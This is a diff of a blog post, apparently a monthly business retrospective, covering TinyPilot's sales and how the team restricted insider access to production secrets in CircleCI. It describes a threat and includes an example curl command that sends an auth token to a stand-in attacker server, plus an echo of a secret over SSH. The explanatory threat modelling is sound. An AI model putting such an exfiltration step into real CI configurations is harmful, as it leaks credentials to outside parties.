mtlynch/mtlynch.io/content/retrospectives/2024/04/index.md

 March was TinyPilot's strongest month of sales revenue in history, narrowly beating [our previous record](/retrospectives/2022/12/#tinypilothttpstinypilotkvmcomrefmtlynchio-stats) by $600.
 Profit at the one-month granularity is down, but the three-month average is the more meaningful metric, and that's looking strong.

-Visits are down from last month but only because February had an atypical surge in visits because of my [year six review](/solo-developer-year-6/) post.
+Visits are down from last month but only because February had an atypical surge in visits from my [year six review](/solo-developer-year-6/) post.

 ## Tightening access to TinyPilot's production secrets

 Over the past few months, we've been [improving TinyPilot's release process](/retrospectives/2024/03/#it-turns-out-we-have-a-25-step-release-process) so that it's more automated and less dependent on me.

 In reviewing our release workflow, we realized that too many team members had access to production secrets.
-Production secrets include things like authentication tokens that allow our automated systems to publish new versions of our website or the TinyPilot application.
+Production secrets include things like authentication tokens for publishing new versions of our website or the TinyPilot application.

-We're a small team, so in our case, "too many" was five people instead of just one.
+We're a small team, so in our case, "too many" team members having access meant five people instead of one.
 Still, four people had access to production secrets that didn't need them.

 Most TinyPilot repositories are ["push on green,"](https://www.usenix.org/publications/login/october-2014-vol-39-no-5/making-push-green-reality) meaning that we push every code change to production after it passes our automated tests on CircleCI, our continuous integration service.

 We store our secrets as CircleCI environment variables.
-This initially seemed fine because environment variables are write-only, meaning that you can't read the values after storing them in CircleCI.
+This initially seemed fine because environment variables are write-only, meaning that you can't read the values after you store them.

 {{<img src="ci-env-vars.webp" has-border="true" max-width="700px" caption="CircleCI's admin interface only shows a portion of the values of environment variables, and only the CircleCI admin can see them.
 Note that I'm showing fake values.">}}

-Once we started thinking more critically about protecting secrets, we realized that despite what CircleCI's web UI suggested, everyone within the TinyPilot Github organization effectively had access to our environment variables.
-A malicious team member with access to TinyPilot source code could extract secrets in one of two ways:
+Once we started thinking more critically about protecting secrets, we realized that despite what CircleCI's web UI suggested, all five team members effectively had access to our environment variables.
+A malicious team member could extract secrets in one of two ways:

-1. They could create a new branch in our source code tree and then push a change to our CircleCI config file that exfiltrates a secret to a remote server they control, like `curl http://attacker-server.example.com/exfiltrate?token=$AUTH_TOKEN`
+1. They could create a new branch in our code repository and then push a change to our CircleCI config file that exfiltrates a secret to a remote server they control, like `curl http://attacker-server.example.com/exfiltrate?token=$AUTH_TOKEN`
 1. They could SSH in to CircleCI for any job and type `echo $AUTH_TOKEN` on the command line.

 (1) was semi-possible to detect, but it wasn't something we ever checked.
 (2) was impossible to detect, as CircleCI doesn't log SSH sessions.

+The attack would have to come from within the TinyPilot team, as third-party contributors don't have access to CircleCI environment variables at all.

-We looked into tightening access, and CircleCI's recommendation was to store security-sensitive secrets in "contexts."
-Contexts are still environment variables, but CircleCI lets you define more granular access to them.
+We looked into tightening access, and CircleCI's documentation recommended storing security-sensitive secrets in "contexts."
+Contexts are still environment variables but with additional access controls.

-Security contexts only allowed you to restrict access to environment variables to a particular set of people.
-So, we could have maintained our existing workflow by giving everyone access to the secrets, but then we're back where we started.
+Security contexts only allowed you to restrict access to a particular set of people.
+So, we could have maintained our existing workflow by giving everyone access to the secrets, but then we're back to square one.
 We could have arbitrarily decided that some subset of the team is trusted and has to initiate every deployment, but that would have added tremendous friction.

 We reached out to CircleCI support, and they said they were coincidentally about to release something that would solve our problem.
 Two weeks later, CircleCI launched [expression-based context restrictions](https://circleci.com/changelog/expression-based-context-restrictions/), which did, in fact, perfectly solve our problem.